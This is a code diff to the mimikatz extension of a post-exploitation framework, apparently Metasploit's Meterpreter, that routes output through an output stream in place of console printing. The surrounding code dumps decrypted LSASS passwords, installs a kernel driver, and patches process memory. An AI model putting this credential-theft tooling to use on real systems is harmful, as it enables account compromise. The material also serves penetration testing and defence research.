@ -327,7 +327,7 @@ bool mod_mimikatz_sekurlsa::searchPasswords(vector<wstring> * arguments)
mod_mimikatz_sekurlsa::SeckPkgFunctionTable->LsaUnprotectMemory(bPassword, donnees[2].MaximumLength);
password.assign(mod_text::stringOrHex(bPassword, donnees[2].Length, 0, false));
}
wcout << L"[" << nbPossible++ << L"] { " << user << L" ; " << domain << L" ; " << password << L" }" << endl;
(*outputStream) << L"[" << nbPossible++ << L"] { " << user << L" ; " << domain << L" ; " << password << L" }" << endl;
}
if(bPassword)
@ -342,6 +342,6 @@ bool mod_mimikatz_sekurlsa::searchPasswords(vector<wstring> * arguments)
}
}
}
else wcout << L"Données LSASS en erreur" << endl;
else (*outputStream) << L"Données LSASS en erreur" << endl;
return true;
}

76
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_service.cpp
View File

@ -18,19 +18,19 @@ vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_service::getMimiKatzComm
bool mod_mimikatz_service::start(vector<wstring> * arguments)
{
wcout << L"Démarrage de \'";
(*outputStream) << L"Démarrage de \'";
return genericFunction(mod_service::start, arguments);
}
bool mod_mimikatz_service::stop(vector<wstring> * arguments)
{
wcout << L"Arrêt de \'";
(*outputStream) << L"Arrêt de \'";
return genericFunction(mod_service::stop, arguments);
}
bool mod_mimikatz_service::remove(vector<wstring> * arguments)
{
wcout << L"Suppression de \'";
(*outputStream) << L"Suppression de \'";
return genericFunction(mod_service::remove, arguments);
}
@ -38,14 +38,14 @@ bool mod_mimikatz_service::genericFunction(PMOD_SERVICE_FUNC function, vector<ws
{
if(!arguments->empty())
{
wcout << arguments->front() << L"\' : ";
(*outputStream) << arguments->front() << L"\' : ";
if(function(&arguments->front(), NULL))
wcout << L"OK";
(*outputStream) << L"OK";
else
wcout << L"KO ; " << mod_system::getWinError();
wcout << endl;
(*outputStream) << L"KO ; " << mod_system::getWinError();
(*outputStream) << endl;
}
else wcout << L"(null)\' - KO ; Nom de service manquant" << endl;
else (*outputStream) << L"(null)\' - KO ; Nom de service manquant" << endl;
return true;
}
@ -83,46 +83,46 @@ bool mod_mimikatz_service::list(vector<wstring> * arguments)
)
{
if(monService->ServiceStatusProcess.dwProcessId != 0)
wcout << setw(5) << setfill(wchar_t(' ')) << monService->ServiceStatusProcess.dwProcessId;
wcout << L'\t';
(*outputStream) << setw(5) << setfill(wchar_t(' ')) << monService->ServiceStatusProcess.dwProcessId;
(*outputStream) << L'\t';
if(monService->ServiceStatusProcess.dwServiceType & SERVICE_INTERACTIVE_PROCESS)
wcout << L"INTERACTIVE_PROCESS" << L'\t';
(*outputStream) << L"INTERACTIVE_PROCESS" << L'\t';
if(monService->ServiceStatusProcess.dwServiceType & SERVICE_FILE_SYSTEM_DRIVER)
wcout << L"FILE_SYSTEM_DRIVER" << L'\t';
(*outputStream) << L"FILE_SYSTEM_DRIVER" << L'\t';
if(monService->ServiceStatusProcess.dwServiceType & SERVICE_KERNEL_DRIVER)
wcout << L"KERNEL_DRIVER" << L'\t';
(*outputStream) << L"KERNEL_DRIVER" << L'\t';
if(monService->ServiceStatusProcess.dwServiceType & SERVICE_WIN32_OWN_PROCESS)
wcout << L"WIN32_OWN_PROCESS" << L'\t';
(*outputStream) << L"WIN32_OWN_PROCESS" << L'\t';
if(monService->ServiceStatusProcess.dwServiceType & SERVICE_WIN32_SHARE_PROCESS)
wcout << L"WIN32_SHARE_PROCESS" << L'\t';
(*outputStream) << L"WIN32_SHARE_PROCESS" << L'\t';
switch(monService->ServiceStatusProcess.dwCurrentState)
{
case SERVICE_CONTINUE_PENDING:
wcout << L"CONTINUE_PENDING";
(*outputStream) << L"CONTINUE_PENDING";
break;
case SERVICE_PAUSE_PENDING:
wcout << L"PAUSE_PENDING";
(*outputStream) << L"PAUSE_PENDING";
break;
case SERVICE_PAUSED:
wcout << L"PAUSED";
(*outputStream) << L"PAUSED";
break;
case SERVICE_RUNNING:
wcout << L"RUNNING";
(*outputStream) << L"RUNNING";
break;
case SERVICE_START_PENDING:
wcout << L"START_PENDING";
(*outputStream) << L"START_PENDING";
break;
case SERVICE_STOP_PENDING:
wcout << L"STOP_PENDING";
(*outputStream) << L"STOP_PENDING";
break;
case SERVICE_STOPPED:
wcout << L"STOPPED";
(*outputStream) << L"STOPPED";
break;
}
wcout << L'\t' <<
(*outputStream) << L'\t' <<
monService->serviceName << L'\t' <<
monService->serviceDisplayName <<
endl;
@ -130,7 +130,7 @@ bool mod_mimikatz_service::list(vector<wstring> * arguments)
}
}
else
wcout << L"mod_service::getList ; " << mod_system::getWinError() << endl;
(*outputStream) << L"mod_service::getList ; " << mod_system::getWinError() << endl;
delete vectorServices;
return true;
@ -145,7 +145,7 @@ bool mod_mimikatz_service::mimikatz(vector<wstring> * arguments)
{
if(GetLastError() == ERROR_SERVICE_DOES_NOT_EXIST)
{
wcout << L"[*] Pilote mimikatz non présent, installation." << endl;
(*outputStream) << L"[*] Pilote mimikatz non présent, installation." << endl;
wstring monPilote = L"mimikatz.sys";
wstring monPiloteComplet = L"";
@ -156,35 +156,35 @@ bool mod_mimikatz_service::mimikatz(vector<wstring> * arguments)
{
if(monService = CreateService(monManager, L"mimikatz", L"mimikatz driver", READ_CONTROL | WRITE_DAC | SERVICE_START, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, monPiloteComplet.c_str(), NULL, NULL, NULL, NULL, NULL))
{
wcout << L"[+] Création du pilote : OK" << endl;
(*outputStream) << L"[+] Création du pilote : OK" << endl;
if(mod_secacl::addWorldToMimikatz(&monService))
wcout << L"[+] Attribution des droits : OK";
(*outputStream) << L"[+] Attribution des droits : OK";
else
wcout << L"[-] Attribution des droits : KO ; " << mod_system::getWinError();
wcout << endl;
(*outputStream) << L"[-] Attribution des droits : KO ; " << mod_system::getWinError();
(*outputStream) << endl;
}
else wcout << L"[!] Impossible de créer le pilote ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"[!] Impossible de créer le pilote ; " << mod_system::getWinError() << endl;
}
else wcout << L"[!] Le pilote ne semble pas exister ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"[!] Le pilote ne semble pas exister ; " << mod_system::getWinError() << endl;
}
else wcout << L"[!] Impossible d\'obtenir le chemin absolu du pilote ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"[!] Impossible d\'obtenir le chemin absolu du pilote ; " << mod_system::getWinError() << endl;
}
else wcout << L"[!] Ouverture du pilote mimikatz : KO ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"[!] Ouverture du pilote mimikatz : KO ; " << mod_system::getWinError() << endl;
}
else wcout << L"[*] Pilote mimikatz déjà présent" << endl;
else (*outputStream) << L"[*] Pilote mimikatz déjà présent" << endl;
if(monService)
{
if(StartService(monService, 0, NULL) != 0)
wcout << L"[+] Démarrage du pilote : OK";
(*outputStream) << L"[+] Démarrage du pilote : OK";
else
wcout << L"[-] Démarrage du pilote : KO ; " << mod_system::getWinError();
wcout << endl;
(*outputStream) << L"[-] Démarrage du pilote : KO ; " << mod_system::getWinError();
(*outputStream) << endl;
CloseServiceHandle(monService);
}
CloseServiceHandle(monManager);
}
else wcout << L"[!] Impossible d\'ouvrir le gestionnaire de service pour création ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"[!] Impossible d\'ouvrir le gestionnaire de service pour création ; " << mod_system::getWinError() << endl;
return true;
}

10
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_standard.cpp
View File

@ -25,7 +25,7 @@ vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_standard::getMimiKatzCom
bool mod_mimikatz_standard::version(vector<wstring> * arguments)
{
wcout << MIMIKATZ_FULL << L" (" << __DATE__ << L' ' << __TIME__ << L')' << endl;
(*outputStream) << MIMIKATZ_FULL << L" (" << __DATE__ << L' ' << __TIME__ << L')' << endl;
return true;
}
@ -51,13 +51,13 @@ bool mod_mimikatz_standard::exit(vector<wstring> * arguments)
bool mod_mimikatz_standard::reponse(vector<wstring> * arguments)
{
wcout << L"La réponse est 42." << endl;
(*outputStream) << L"La réponse est 42." << endl;
return true;
}
bool mod_mimikatz_standard::cite(vector<wstring> * arguments)
{
wcout << L"I edit the world in HEX" << endl;
(*outputStream) << L"I edit the world in HEX" << endl;
return true;
}
@ -69,8 +69,8 @@ bool mod_mimikatz_standard::sleep(vector<wstring> * arguments)
wstringstream z;
z << arguments->front(); z >> dwMilliseconds;
}
wcout << L"Sleep : " << dwMilliseconds << L" ms... " << flush;
(*outputStream) << L"Sleep : " << dwMilliseconds << L" ms... " << flush;
Sleep(dwMilliseconds);
wcout << L"Fin !" << endl;
(*outputStream) << L"Fin !" << endl;
return true;
}

8
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_system.cpp
View File

@ -18,9 +18,9 @@ bool mod_mimikatz_system::user(vector<wstring> * arguments)
wstring monUser;
if(mod_system::getUserName(&monUser))
wcout << L"Utilisateur : " << monUser << endl;
(*outputStream) << L"Utilisateur : " << monUser << endl;
else
wcout << L"mod_system::getUserName : " << mod_system::getWinError();
(*outputStream) << L"mod_system::getUserName : " << mod_system::getWinError();
return true;
}
@ -30,9 +30,9 @@ bool mod_mimikatz_system::computer(vector<wstring> * arguments)
wstring monComputer;
if(mod_system::getComputerName(&monComputer))
wcout << L"Ordinateur : " << monComputer << endl;
(*outputStream) << L"Ordinateur : " << monComputer << endl;
else
wcout << L"mod_system::getComputerName : " << mod_system::getWinError();
(*outputStream) << L"mod_system::getComputerName : " << mod_system::getWinError();
return true;
}

42
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_terminalserver.cpp
View File

@ -23,10 +23,10 @@ bool mod_mimikatz_terminalserver::sessions(vector<wstring> * arguments)
if(mod_ts::getSessions(&mesSessions, (arguments->size() ? &arguments->front() : NULL)))
{
wcout << L"SessId\tEtat\tstrEtat" << endl;
(*outputStream) << L"SessId\tEtat\tstrEtat" << endl;
for(vector<mod_ts::KIWI_WTS_SESSION_INFO>::iterator maSession = mesSessions.begin(); maSession != mesSessions.end(); maSession++)
{
wcout <<
(*outputStream) <<
setw(5) << setfill(wchar_t(' ')) << maSession->id << L'\t' <<
setw(5) << setfill(wchar_t(' ')) << maSession->state << L'\t' <<
setw(15) << setfill(wchar_t(' ')) << left << stateToType(maSession->state) << right << L'\t' <<
@ -34,7 +34,7 @@ bool mod_mimikatz_terminalserver::sessions(vector<wstring> * arguments)
endl;
}
}
else wcout << L"mod_ts::getSessions : " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_ts::getSessions : " << mod_system::getWinError() << endl;
return true;
}
@ -45,10 +45,10 @@ bool mod_mimikatz_terminalserver::processes(vector<wstring> * arguments)
if(mod_ts::getProcesses(&mesProcess, (arguments->size() ? &arguments->front() : NULL)))
{
wcout << L"PID\tSessId\tUtilisateur" << endl;
(*outputStream) << L"PID\tSessId\tUtilisateur" << endl;
for(vector<mod_ts::KIWI_WTS_PROCESS_INFO>::iterator monProcess = mesProcess.begin(); monProcess != mesProcess.end(); monProcess++)
{
wcout <<
(*outputStream) <<
setw(5) << setfill(wchar_t(' ')) << monProcess->pid << L'\t' <<
setw(5) << setfill(wchar_t(' ')) << monProcess->sessionId << L'\t' <<
setw(48) << setfill(wchar_t(' ')) << left << monProcess->userSid << right << L'\t' <<
@ -56,7 +56,7 @@ bool mod_mimikatz_terminalserver::processes(vector<wstring> * arguments)
endl;
}
}
else wcout << L"mod_ts::getSessions : " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_ts::getSessions : " << mod_system::getWinError() << endl;
return true;
}
@ -110,7 +110,7 @@ bool mod_mimikatz_terminalserver::modifyshadow(vector<wstring> * arguments)
if(!strError)
listAndOrModifySession(ptrSession, &newState);
else
wcout << L"Erreur de parsing de l\'argument : " << strState << endl;
(*outputStream) << L"Erreur de parsing de l\'argument : " << strState << endl;
}
return true;
@ -175,38 +175,38 @@ bool mod_mimikatz_terminalserver::listAndOrModifySession(DWORD * id, DWORD * new
{
if((!id) || (maSession->id == *id))
{
wcout << L"@Winstation : " << addrWinstation << endl;
(*outputStream) << L"@Winstation : " << addrWinstation << endl;
wcout << L"\t" << maSession->prev << L" <-> " << maSession->next << endl;
wcout << L"\tid : " << maSession->id << endl;
wcout << L"\tname : " << maSession->name << endl;
wcout << L"\tsname : " << maSession->sname << endl;
wcout << L"\ttype : " << maSession->type << endl;
wcout << L"\tshadow : " << maSession->shadow << L" (" << shadowToType(maSession->shadow) << L")" << endl;
(*outputStream) << L"\t" << maSession->prev << L" <-> " << maSession->next << endl;
(*outputStream) << L"\tid : " << maSession->id << endl;
(*outputStream) << L"\tname : " << maSession->name << endl;
(*outputStream) << L"\tsname : " << maSession->sname << endl;
(*outputStream) << L"\ttype : " << maSession->type << endl;
(*outputStream) << L"\tshadow : " << maSession->shadow << L" (" << shadowToType(maSession->shadow) << L")" << endl;
if(newState)
{
reussite = mod_memory::writeMemory(addrWinstation + FIELD_OFFSET(KIWI_TS_SESSION, shadow), newState, sizeof(DWORD), processHandle);
wcout << L"\t => " << *newState << L" (" <<shadowToType(*newState) << L") : " << (reussite ? L"OK" : L"KO") << endl;
(*outputStream) << L"\t => " << *newState << L" (" <<shadowToType(*newState) << L") : " << (reussite ? L"OK" : L"KO") << endl;
}
wcout << endl;
(*outputStream) << endl;
}
}
delete maSession;
}
} while(addrWinstation != addrWinstationListHead);
}
else wcout << L"mod_memory::readMemory " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_memory::readMemory " << mod_system::getWinError() << endl;
}
else wcout << L"mod_memory::searchMemory " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_memory::searchMemory " << mod_system::getWinError() << endl;
CloseHandle(processHandle);
}
else wcout << L"OpenProcess " << mod_system::getWinError() << endl;
else (*outputStream) << L"OpenProcess " << mod_system::getWinError() << endl;
}
else wcout << L"mod_process::getUniqueModuleForName : " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_process::getUniqueModuleForName : " << mod_system::getWinError() << endl;
}
else wcout << L"mod_process::getUniqueServiceForName : " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_process::getUniqueServiceForName : " << mod_system::getWinError() << endl;
}
return reussite;
}

46
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_thread.cpp
View File

@ -24,16 +24,16 @@ bool mod_mimikatz_thread::list(vector<wstring> * arguments)
if(mod_thread::getList(vectorThreads, arguments->empty() ? NULL : &processId))
{
wcout << L"PID\tTID\tprTh" << endl;
(*outputStream) << L"PID\tTID\tprTh" << endl;
for(vector<THREADENTRY32>::iterator monThread = vectorThreads->begin(); monThread != vectorThreads->end(); monThread++)
wcout <<
(*outputStream) <<
setw(5) << setfill(wchar_t(' ')) << monThread->th32OwnerProcessID << L'\t' <<
setw(5) << setfill(wchar_t(' ')) << monThread->th32ThreadID << L'\t' <<
setw(5) << setfill(wchar_t(' ')) << monThread->tpBasePri <<
endl;
}
else
wcout << L"mod_thread::getList ; " << mod_system::getWinError() << endl;
(*outputStream) << L"mod_thread::getList ; " << mod_system::getWinError() << endl;
delete vectorThreads;
return true;
@ -47,17 +47,17 @@ bool mod_mimikatz_thread::resume(vector<wstring> * arguments)
if(threadId != 0)
{
wcout << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\treprise ";
(*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\treprise ";
if(mod_thread::resume(threadId))
wcout << L"OK";
(*outputStream) << L"OK";
else
wcout << L"KO - mod_thread::resume ; " << mod_system::getWinError();
(*outputStream) << L"KO - mod_thread::resume ; " << mod_system::getWinError();
}
else
wcout << L"argument \'" << *monArgThread << L"\' invalide";
(*outputStream) << L"argument \'" << *monArgThread << L"\' invalide";
wcout << endl;
(*outputStream) << endl;
}
return true;
@ -71,17 +71,17 @@ bool mod_mimikatz_thread::suspend(vector<wstring> * arguments)
if(threadId != 0)
{
wcout << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tsuspension ";
(*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tsuspension ";
if(mod_thread::suspend(threadId))
wcout << L"OK";
(*outputStream) << L"OK";
else
wcout << L"KO - mod_thread::suspend ; " << mod_system::getWinError();
(*outputStream) << L"KO - mod_thread::suspend ; " << mod_system::getWinError();
}
else
wcout << L"argument \'" << *monArgThread << L"\' invalide";
(*outputStream) << L"argument \'" << *monArgThread << L"\' invalide";
wcout << endl;
(*outputStream) << endl;
}
return true;
@ -95,17 +95,17 @@ bool mod_mimikatz_thread::stop(vector<wstring> * arguments)
if(threadId != 0)
{
wcout << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tarrêt ";
(*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tarręt ";
if(mod_thread::stop(threadId))
wcout << L"OK";
(*outputStream) << L"OK";
else
wcout << L"KO - mod_thread::stop ; " << mod_system::getWinError();
(*outputStream) << L"KO - mod_thread::stop ; " << mod_system::getWinError();
}
else
wcout << L"argument \'" << *monArgThread << L"\' invalide";
(*outputStream) << L"argument \'" << *monArgThread << L"\' invalide";
wcout << endl;
(*outputStream) << endl;
}
return true;
@ -120,17 +120,17 @@ bool mod_mimikatz_thread::quit(vector<wstring> * arguments)
if(threadId != 0)
{
wcout << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tmessage fermeture ";
(*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tmessage fermeture ";
if(mod_thread::quit(threadId))
wcout << L"OK";
(*outputStream) << L"OK";
else
wcout << L"KO - mod_thread::quit ; " << mod_system::getWinError();
(*outputStream) << L"KO - mod_thread::quit ; " << mod_system::getWinError();
}
else
wcout << L"argument \'" << *monArgThread << L"\' invalide";
(*outputStream) << L"argument \'" << *monArgThread << L"\' invalide";
wcout << endl;
(*outputStream) << endl;
}
return true;

10
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_winmine.cpp
View File

@ -36,32 +36,32 @@ bool mod_mimikatz_winmine::infosOrCheat(vector<wstring> * arguments, bool cheat)
structMonDemineur monDemineur;
if(mod_memory::readMemory(maStruct->addrMonDemineur, &monDemineur, sizeof(structMonDemineur), maStruct->hWinmine))
{
wcout << L"Mines : " << monDemineur.nbMines << endl <<
(*outputStream) << L"Mines : " << monDemineur.nbMines << endl <<
L"Dimension : " << monDemineur.hauteur << L" lignes x " << monDemineur.longueur << L" colonnes" << endl <<
L"Champ : " << endl << endl;
for (DWORD y = 1; y <= monDemineur.hauteur; y++)
{
if(!cheat)
wcout << L'\t';
(*outputStream) << L'\t';
for(DWORD x = 1; x <= monDemineur.longueur; x++)
{
BYTE laCase = monDemineur.tabMines[y][x];
if(!cheat)
wcout << L' ' << static_cast<wchar_t>((laCase & 0x80) ? '*' : DISP_WINMINE[laCase & 0x0f]);
(*outputStream) << L' ' << static_cast<wchar_t>((laCase & 0x80) ? '*' : DISP_WINMINE[laCase & 0x0f]);
else if(laCase & 0x80)
monDemineur.tabMines[y][x] = 0x4e;
}
if(!cheat)
wcout << endl;
(*outputStream) << endl;
}
if(cheat)
{
if(mod_memory::writeMemory(maStruct->addrMonDemineur, &monDemineur, sizeof(structMonDemineur), maStruct->hWinmine))
wcout << L"Patché ;)" << endl;
(*outputStream) << L"Patché ;)" << endl;
vector<mod_windows::KIWI_HWND_ENTRY> mesHWNDS;
if(mod_windows::getHWNDsFromProcessId(&mesHWNDS, maStruct->pidWinmine))

20
c/meterpreter/source/extensions/mimikatz/modules/mod_patch.cpp
View File

@ -14,12 +14,12 @@ bool mod_patch::patchModuleOfService(wstring serviceName, wstring moduleName, BY
{
if(monService.ServiceStatusProcess.dwCurrentState != SERVICE_STOPPED && monService.ServiceStatusProcess.dwCurrentState != SERVICE_STOP_PENDING)
{
wcout << L"Service : " << monService.serviceDisplayName << endl;
(*outputStream) << L"Service : " << monService.serviceDisplayName << endl;
reussite = patchModuleOfPID(monService.ServiceStatusProcess.dwProcessId, moduleName, patternToSearch, szPatternToSearch, patternToPlace, szPatternToPlace, offsetForPlace);
}
else wcout << L"Le service : " << serviceName << L" (" << monService.serviceDisplayName << L") ; n\'a pas l\'air très actif" << endl;
else (*outputStream) << L"Le service : " << serviceName << L" (" << monService.serviceDisplayName << L") ; n\'a pas l\'air très actif" << endl;
}
else wcout << L"Impossible de trouver le service : " << serviceName << L" ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"Impossible de trouver le service : " << serviceName << L" ; " << mod_system::getWinError() << endl;
return reussite;
}
@ -36,21 +36,21 @@ bool mod_patch::patchModuleOfPID(DWORD pid, wstring moduleName, BYTE * patternTo
if(HANDLE processHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, pid))
{
wcout << L"Recherche des patterns dans : " << moduleName << L"@pid(" << pid << L")" << endl;
(*outputStream) << L"Recherche des patterns dans : " << moduleName << L"@pid(" << pid << L")" << endl;
BYTE * addrPattern = NULL;
if(mod_memory::searchMemory(baseAddr, baseAddr + taille, patternToSearch, &addrPattern, szPatternToSearch, true, processHandle))
{
reussite = mod_memory::writeMemory(addrPattern + offsetForPlace, patternToPlace, szPatternToPlace, processHandle);
wcout << L"Patch " << moduleName << L"@pid(" << pid << L") : " << (reussite ? L"OK" : L"KO") << endl;
(*outputStream) << L"Patch " << moduleName << L"@pid(" << pid << L") : " << (reussite ? L"OK" : L"KO") << endl;
}
else wcout << L"mod_memory::searchMemory " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_memory::searchMemory " << mod_system::getWinError() << endl;
CloseHandle(processHandle);
}
else wcout << L"OpenProcess : " << mod_system::getWinError() << endl;
else (*outputStream) << L"OpenProcess : " << mod_system::getWinError() << endl;
}
else wcout << L"mod_process::getUniqueModuleForName : " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_process::getUniqueModuleForName : " << mod_system::getWinError() << endl;
return reussite;
}
@ -95,7 +95,7 @@ bool mod_patch::checkVersion(KIWI_OS_CHECK * monOsValide)
(monOsValide->is64 == is64)
;
}
else wcout << L"mod_patch::getFullVersion : " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_patch::getFullVersion : " << mod_system::getWinError() << endl;
return reussite;
}
@ -139,7 +139,7 @@ bool mod_patch::checkVersion(vector<OS> * vectorValid)
}
if(!reussite)
wcout << L"La version du système d\'exploitation actuelle n\'est pas supportée par cette fonction." << endl;
(*outputStream) << L"La version du système d\'exploitation actuelle n\'est pas supportée par cette fonction." << endl;
return reussite;
}

3
c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj
View File

@ -239,6 +239,7 @@
</ProjectReference>
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\..\source\extensions\mimikatz\global.cpp" />
<ClCompile Include="..\..\source\extensions\mimikatz\main.cpp" />
<ClCompile Include="..\..\source\extensions\mimikatz\mimikatz.cpp" />
<ClCompile Include="..\..\source\extensions\mimikatz\modules\kmodel.cpp" />
@ -292,6 +293,8 @@
<ClCompile Include="..\..\source\extensions\mimikatz\modules\Security Packages\wdigest.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\source\extensions\mimikatz\global.h" />
<ClInclude Include="..\..\source\extensions\mimikatz\main.h" />
<ClInclude Include="..\..\source\extensions\mimikatz\mimikatz.h" />
<ClInclude Include="..\..\source\extensions\mimikatz\modules\globdefs.h" />
<ClInclude Include="..\..\source\extensions\mimikatz\modules\kmodel.h" />

3
c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj.filters
View File

@ -150,6 +150,7 @@
<ClCompile Include="..\..\source\extensions\mimikatz\modules\mod_crypto.cpp">
<Filter>modules</Filter>
</ClCompile>
<ClCompile Include="..\..\source\extensions\mimikatz\global.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\source\extensions\mimikatz\mimikatz.h" />
@ -309,6 +310,8 @@
<ClInclude Include="..\..\source\extensions\mimikatz\modules\mod_winsta_desktop.h">
<Filter>modules</Filter>
</ClInclude>
<ClInclude Include="..\..\source\extensions\mimikatz\main.h" />
<ClInclude Include="..\..\source\extensions\mimikatz\global.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="..\..\source\extensions\mimikatz\mimikatz.rc" />